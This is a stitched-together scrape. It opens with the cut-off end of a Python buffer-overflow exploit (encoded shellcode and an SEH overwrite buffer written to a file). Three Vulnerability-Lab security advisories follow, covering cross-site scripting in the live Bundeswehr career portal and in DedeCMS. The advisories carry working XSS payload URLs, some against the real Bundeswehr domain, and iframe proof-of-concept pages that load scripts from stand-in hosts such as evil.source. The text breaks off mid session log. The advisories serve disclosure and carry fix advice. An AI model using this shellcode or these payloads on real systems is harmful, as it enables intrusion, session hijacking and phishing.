shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"



buffer = offset + nseh + seh + nops + shellcode

f = open(file,'w')
f.write(buffer)
f.close()

Document Title:
===============
Bundeswehr Karriere - Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2213

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2020/04/04/bundeswehr-career-page-weak-spot-permanently-closed

Video: https://www.vulnerability-lab.com/get_content.php?id=2197


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2213


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Als Bundeswehr bezeichnet man die Streitkräfte der Bundesrepublik
Deutschland einschließlich der Bundeswehrverwaltung und
weiterer Organisationsbereiche, die im Geschäftsbereich des
Bundesministeriums der Verteidigung liegen. Die BWI Informationstechnik
GmbH wurde 2006 von Bundeswehr, IBM und Siemens gegründet. Zusammen mit
den Gesellschaften BWI Systeme GmbH und BWI
Services GmbH bildet sie den BWI Leistungsverbund zur Umsetzung von
Herkules, der größten öffentlich-privaten
Partnerschaft in Europa.

(Copy of the Homepage:  https://de.wikipedia.org/wiki/Bundeswehr)
(Copy of the Homepage:
https://de.wikipedia.org/wiki/BWI_Informationstechnik)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core APT Research Team has identified
several cross site scripting vulnerabilities in a
web application of the German Bundeswehr. The Bundeswehr career portal
is affected.


Affected Product(s):
===============
Hersteller: Bundeswehr
Technology:  Web-Server
Produkt: Bundeswehr Karriereportal (Web-Applikation)
Module:  Suchmaschine - Karriere
Dienstleister: BWI


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Coordinated Disclosure


Technical Details & Description:
================================
Several non-persistent cross site scripting scripting security
vulnerabilities have been discovered in the official career site of
the German Bundeswehr. The vulnerability type allows attackers to
manipulate client-side controlled application calls.

The cross site scripting vulnerabilities are located in the
'termination', 'interests', 'careers' and 'search' parameters of
the 'career' module in the 'search' function. The GET method request is
not cleanly cleaned up when retrieving with the vulnerable
parameters. There is no validation where the request is intercepted,
cleaned or filtered. As a result,
attackers can submit their own malicious input to the https request to
the official Bundeswehr career website. In the
search, all parameters from the new page are listed and thus finally
executed via the request. In the case of a
successful attack, an attacker could, for example, steal session
information such as cookies, generate phishing pages,
identify persons with external calls, integrate client-side exploits
(drive-by) or redirect to harmful web server pages.
Since the web server should recognize all external sources or integrated
calls, there may be a problem with the
security of the SSL certificate via the Same Origin Policy.

The security risk of cross site scripting vulnerabilities in the search
function of the web application are considered medium.
To exploit the vulnerability, an attacker does not need a web
application user account, but does require light user
interaction by visiting a link. Exploitation of the vulnerability
results in the theft of cookie information, calling harmful
external sources in the Bundeswehr web context or spear phishing attacks.

Request Method(s):
[+] GET

Vulnerable Service(s):
[+] Bundeswehr Karriere (Web-Applikation) www.bundeswehrkarriere.de

Vulnerable Module(s):
[+] Karriere Suche (ajax/filterlist/de/auswahl/33050/)

Vulnerable Parameter(s):
[+] Abschluss
[+] Interessen
[+] Laufbahnen
[+] Suche


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by attackers without a privileged
user account but with light user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manuelle Schritte zum reproduzieren der Sicherheitslücke
1. Öffne die Bundeswehr Karriere Webseite
Note: https://www.bundeswehrkarriere.de/karriere
2. Starte einen http/https protocol session tamper zum eingreifen in den
Aufruf (live)
3. Starte eine Suche und klick auf die Lupe
4. Beim suchen fügt der Angreifer live im session tamper programm im GET
method request seine payloads ein
5. Der Inhalt der Parameter wird unten in der Suche ausgegeben und führt
sich direkt aus
6. Erfolgreiche Reproduktion der Sicherheitslücke!


PoC: Payloads (Exploitation)
https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test

https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Suche:test

https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Laufbahnen:Unteroffiziere;Suche:test

https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test

https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E



PoC: Vulnerable Source
<div class="row">
<div class="col-lg-6 col-md-6 col-sm-6 col-xs-12 js-filter
js-filter-multi" data-defaultlabel="Bitte wählen Sie"
data-selectlabel="gewählt" data-update="true"
data-required="false" data-disabled="true" data-connection="OR"
data-key="subjecttaxonomy" data-label="Organisationsbereiche"
data-id="33052">
<h5 class="">Organisationsbereiche</h5>
<select class="filter-select js-select select2-hidden-accessible"
multiple="" data-enable-placeholder="true" data-placeholder="Bitte
wählen Sie" tabindex="-1" style="" aria-hidden="true">
<option data-label="Bundeswehrverwaltung" data-id="31730"
data-facet="0" value="31730"
data-text="Bundeswehrverwaltung">Bundeswehrverwaltung</option>
<option data-label="Heer" data-id="31732" data-facet="0"
value="31732" data-text="Heer">Heer</option>
<option data-label="Luftwaffe" data-id="31820" data-facet="0"
value="31820" data-text="Luftwaffe">Luftwaffe</option>
<option data-label="Marine" data-id="31822" data-facet="0"
value="31822" data-text="Marine">Marine</option>
<option data-label="Streitkraeftebasis" data-id="31824"
data-facet="0" value="31824"
data-text="Streitkräftebasis">Streitkräftebasis</option>
<option data-label="Sanitaetsdienst" data-id="50290"
data-facet="0" value="50290"
data-text="Sanitätsdienst">Sanitätsdienst</option>
</select><span class="select2 select2-container
select2-container--default" dir="ltr" style="width: 155px;"><span
class="selection"><span class="select2-selection
select2-selection--multiple"
role="combobox" aria-autocomplete="list" aria-haspopup="true"
aria-expanded="false" tabindex="-1"><ul
class="select2-selection__rendered"><li class="select2-search
select2-search--inline first last">
<span tabindex="0" class="search-placeholder" data-title="Bitte wählen
Sie" data-defaulttitle="Bitte wählen Sie"><input
class="select2-selection--multiple select2-search__field" type="button">
</span></li></ul></span></span><span class="dropdown-wrapper"
aria-hidden="true"></span></span>
</div><div class="col-lg-6 col-md-6 col-sm-6 col-xs-12 js-filter
js-filter-single" data-defaultlabel="Bitte wählen Sie"
data-update="true" data-connection="OR" data-key="subjecttaxonomy"
data-required="false" data-disabled="true" data-label="Laufbahnen"
data-id="33122">
<h5 class="">Laufbahnen</h5>
<div class="btn-group-responsive">
<select class="filter-select js-select
select2-hidden-accessible" data-enable-placeholder="true"
data-placeholder="Bitte wählen Sie" tabindex="-1" style=""
aria-hidden="true">
<option>Bitte wählen Sie</option>
<option data-label="Mannschaften" data-id="31858"
data-facet="0" value="31858" data-text="Mannschaften">Mannschaften</option>
<option data-label="Unteroffiziere" data-id="31864"
data-facet="0" value="31864"
data-text="Unteroffiziere">Unteroffiziere</option>
<option data-label="Feldwebel" data-id="31860" data-facet="0"
value="31860" data-text="Feldwebel">Feldwebel</option>
<option data-label="Offiziere" data-id="31862" data-facet="0"
value="31862" data-text="Offiziere">Offiziere</option>
<option data-label="Reserve" data-id="50304" data-facet="0"
value="50304" data-text="Reserve">Reserve</option>
<option data-label="Mittlerer_Dienst" data-id="41976"
data-facet="0" value="41976" data-text="Mittlerer Dienst">Mittlerer
Dienst</option>
<option data-label="Gehobener_Dienst" data-id="41978"
data-facet="0" value="41978" data-text="Gehobener Dienst">Gehobener
Dienst</option>
<option data-label="Hoeherer_Dienst" data-id="41980"
data-facet="0" value="41980" data-text="Höherer Dienst">Höherer
Dienst</option>
</select><span class="select2 select2-container
select2-container--default select2-container--below" dir="ltr"
style="width: 125px;"><span class="selection">
<span class="select2-selection select2-selection--single"
role="combobox" aria-autocomplete="list" aria-haspopup="true"
aria-expanded="false" tabindex="0"
aria-labelledby="select2-kbwa-container"><span
class="select2-selection__rendered" id="select2-kbwa-container"
title="Unteroffiziere"><span><span class="js-label">Unteroffiziere</span>
<span class="caret"></span></span></span><span
class="select2-selection__arrow" role="presentation"><b
role="presentation"></b></span></span></span>
<span class="dropdown-wrapper" aria-hidden="true"></span></span>
</div>
</div></div>
<div class="row">
<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 js-filter
js-filter-search" data-update="true" data-connection="OR" data-key="search"
data-required="false" data-disabled="true" data-label="Suche"
data-id="33126">
<h5 class=" hidden">Suche</h5>
<div class="form-group">
<input class="form-control js-search-input"
placeholder="Suchbegriff" type="text">
<input id="search-term" class="js-search-submit" value="Suche"
type="button">
</div>
</div></div>
PoC: Execution
Suche
Laufbahn
Bitte wählen Sie**
AuswahlX
<javascript:void();>AbiturX>"<[MALICIOUS PAYLOAD!]
<javascript:void();>UnteroffiziereX>"<[MALICIOUS PAYLOAD!]
<javascript:void();>FuehrungX>"<[MALICIOUS PAYLOAD!]
<javascript:void();>test >"<[MALICIOUS PAYLOAD!]
//
Laufbahnen
  * // Laufbahnen <#>
  * // Jobprofile <#>
  * // Auch interessant <#>
Keine Treffer gefunden
Bitte geben Sie Ihren bereits erreichten oder angestrebten
Schulabschluss an, damit wir Ihnen Ihre passenden Jobmöglichkeiten
anzeigen koennen.


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET
https://www.bundeswehrkarriere.de/ajax/filterlist/de/auswahl/33050/h_368f9ea9884c87f4c9d45368542ba48f?subjecttaxonomy=33120%2331848%3B33118%2331770%3B33052%2331732%3B33122%2341980%3B50510%2350470
&search=33126%23%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fwww.test.de%3E&limit=12&offset=0&sort=relevance+asc%3Bsearchdate+asc

Mime Type[text/html]
   Request Header:
      Host[www.bundeswehrkarriere.de]
      Referer[https://www.bundeswehrkarriere.de/karriere]
      Connection[keep-alive]
   Response Header:
      200 OK
      Server[Apache]
      Content-Type[text/html;charset=UTF-8]
      Content-Language[de]
      x-varnish[23952790]
      Via[1.1 varnish-v4]
      Accept-Ranges[bytes]
      Connection[close]


Solution - Fix & Patch:
=======================
The security gap can be quickly resolved by the following work-around ...
1. Input fields must prevent the input of special characters (Disallow
Specialchars)
2. Parse or filter the content of the parameters via GET to prevent input
3. Use the escape function for the output at the end of the function
4. Check why the SSL certificate does not expire on external calls


Security Risk:
==============
The security risk of client-side cross site scripting web vulnerability
in the Bundeswehr career application is to be rated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.



Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™






-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Cross Site Scripting Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2194


Release Date:
=============
2020-04-08


Vulnerability Laboratory ID (VL-ID):
====================================
2194


Common Vulnerability Scoring System:
====================================
4.1


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management
system in China-Zhimeng content management system,
he will be your first choice for easy website building. Adopt XML name
space style core templates: all templates are
saved in file form, which provides great convenience for users to design
templates and website upgrade transfers.
The robust template tags provide strong support for webmasters to DIY
their own websites. High-efficiency tag caching
mechanism: Allows the caching of similar tags. When generating HTML, it
helps to improve the reaction speed of the
system and reduce the resources consumed by the system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
non-persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.


Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System  v5.7 SP2


Vulnerability Disclosure Timeline:
==================================
2020-04-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple non-persistent cross site scripting vulnerabilities has been
discovered in the official DedeCMS v5.7 SP2 UTF8  web-application.
The vulnerability allows remote attackers to inject
own malicious script codes with non-persistent attack vector to
compromise browser to web-application requests from the client-side.

The cross site scripting web security vulnerabilities are located in the
`filename`, `mid`, `userid`, `templet` parameters of the  `tpl.php`,
`mychannel_edit.php`, `file_manage_view.php`, `sys_admin_user_edit.php`,
`makehtml_homepage.php` files.  The request method to inject
the malicious script code is GET and the attack vector of the
vulnerability is non-persistent on client-side.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is GET. The vulnerabilities are classic client-side cross
site
scripting vulnerabilities. Successful exploitation of the vulnerability
results in session hijacking, non-persistent phishing attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] tpl.php
[+] mychannel_edit.php
[+] file_manage_view.php
[+] sys_admin_user_edit.php
[+] makehtml_homepage.php

Vulnerable Parameter(s):
[+] filename
[+] mid
[+] userid
[+] templet


Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers without
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Request: Examples
https://test23.localhost:8080/dede/tpl.php?acdir=default&action=edit&filename=data.html
https://test23.localhost:8080/dede/mychannel_edit.php?mid=1&dopost=modifysearch
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=edit&filename=data.html&activepath=
https://test23.localhost:8080/dede/sys_admin_user_edit.php?id=1&userid=23&dopost=delete
https://test23.localhost:8080/dede/makehtml_homepage.php?dopost=view&templet=13


PoC: Payload
>">%20<iframe src=evil.source/file.js onload=alert(x)>
>">%20<img src=evil.source/file.js onload=alert(x)>


PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/tpl.php?acdir=default&action=edit&filename=>">%20<iframe
src=evil.source onload=alert(x)>%20">
<iframe
src="https://test23.localhost:8080/dede/mychannel_edit.php?mid=>">%20<iframe
src=evil.source onload=alert(x)>&dopost=modifysearch">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=edit&filename=>">%20<iframe
src=evil.source onload=alert(x)>&activepath=">
<iframe
src="https://test23.localhost:8080/dede/sys_admin_user_edit.php?id=1&userid="><iframe
src=evil.source onload=alert(document.domain)>&dopost=delete">
<iframe
src="https://test23.localhost:8080/dede/makehtml_homepage.php?dopost=view&templet=>">%20<iframe
src=evil.source onload=alert(x)>%20">
...


Reference(s):
https://test23.localhost:8080/dede/tpl.php
https://test23.localhost:8080/dede/mychannel_edit.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/dede/sys_admin_user_edit.php
https://test23.localhost:8080/dede/makehtml_homepage.php


Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars
2. Restrict the vulnerable paramter input to prevent injects via get
method request
3. Secure the output location were the content is insecure sanitized
delivered as output


Security Risk:
==============
The security risk of the client-side non-persistent cross site scripting
web vulnerabilities in the different modules are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™


-- 
Company Name: Vulnerability Laboratory (Vulnerability Lab)
Address: Ludwig-Erhard Straße 4 - 34131 Kassel (Germany)
Representative: Geschäftsführer & Administrator

Phone: +49(0)561-40085396
Fax:  +49(0)561-81024871
PGP:
https://www.vulnerability-lab.com/keys%2Fadmin%40vulnerability-lab.com(0x198E9928).txt
Domain: www.vulnerability-lab.com

Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195


Release Date:
=============
2020-04-09


Vulnerability Laboratory ID (VL-ID):
====================================
2195


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management
system in China-Zhimeng content management system,
he will be your first choice for easy website building. Adopt XML name
space style core templates: all templates are
saved in file form, which provides great convenience for users to design
templates and website upgrade transfers.
The robust template tags provide strong support for webmasters to DIY
their own websites. High-efficiency tag caching
mechanism: Allows the caching of similar tags. When generating HTML, it
helps to improve the reaction speed of the
system and reduce the resources consumed by the system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.


Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System  v5.7 SP2


Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities has been
discovered in the official DedeCMS v5.7 SP2 UTF8  web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent script code inject web vulnerabilities are located in the
`activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor`
and `CKEditorFuncNum`parameters of the  `file_pic_view.php`,
`file_manage_view.php`, `tags_main.php`, `select_media.php`,
`media_main.php` files.
The attack vector of the vulnerability is non-persistent and the request
method to inject is POST. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation
of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php

Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum


Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en


PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].*
onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png
onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E


PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe
src=evil.source
onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe
src=evil.source onload=alert(document.domain)>2&langCode=en">
...

--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
